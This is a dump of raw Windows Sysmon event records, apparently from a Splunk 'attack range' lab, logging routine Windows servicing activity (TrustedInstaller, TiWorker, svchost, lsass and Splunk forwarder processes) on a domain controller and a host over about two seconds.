07:57:02.711{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5CA-60EB-6A7D-00000000CF01}9944C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:02.259{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07F5DD006E2E5CDCE2E121412A6D53AF,SHA256=46E62F5BF19E83ACEBFF4E087EDD5C7430590A0ED44AF4A6AFCB26C08FE4AFC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:02.184{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC35A54E105D7968A2C7362F026A0D8D,SHA256=22CB951706299724BF1919B8DB6A1EDC5073215771F7A2AB7A3B520EF0989E4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808422Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:03.746{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B4CBC8526FDB176290F4E330B8D03A8,SHA256=88AFB726B34CA2042808A5B81175A81619645682F91A9383E67985CB58959B0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.295{466BC892-F5CF-60EB-717D-00000000CF01}19089560C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe{466BC892-F5CF-60EB-707D-00000000CF01}1196C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000001050848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.279{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EACBBE82E02D3797FB545A86F223541,SHA256=B34C34A334B9D0104D18E71EC5D3CB61BAECD9DFFAB202C0DB101D72D9088A40,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808421Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:02.332{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57327-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001050847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.175{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5CF-60EB-717D-00000000CF01}1908C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.157{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.157{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.157{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.157{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.142{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F5CF-60EB-717D-00000000CF01}1908C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.142{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5CF-60EB-717D-00000000CF01}1908C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.141{466BC892-F5CF-60EB-717D-00000000CF01}1908C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe10.0.14393.4222 (rs1_release.210113-1739)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=1571A4132449A317F66DF783E9468783,SHA256=5CFF48937FAE7F0CF5935248959141E2A60E88FE8105C43676B866FDAC36ADD2,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001050839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.126{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5CF-60EB-707D-00000000CF01}1196C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.079{466BC892-02AD-60E8-0A00-00000000CF01}6162696C:\Windows\system32\services.exe{466BC892-F5CF-60EB-707D-00000000CF01}1196C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.026{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.026{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.026{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.026{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.026{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5CF-60EB-707D-00000000CF01}1196C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.026{466BC892-02AD-60E8-0A00-00000000CF01}6164268C:\Windows\system32\services.exe{466BC892-F5CF-60EB-707D-00000000CF01}1196C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.017{466BC892-F5CF-60EB-707D-00000000CF01}1196C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001050830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.011{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.011{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.011{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.011{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 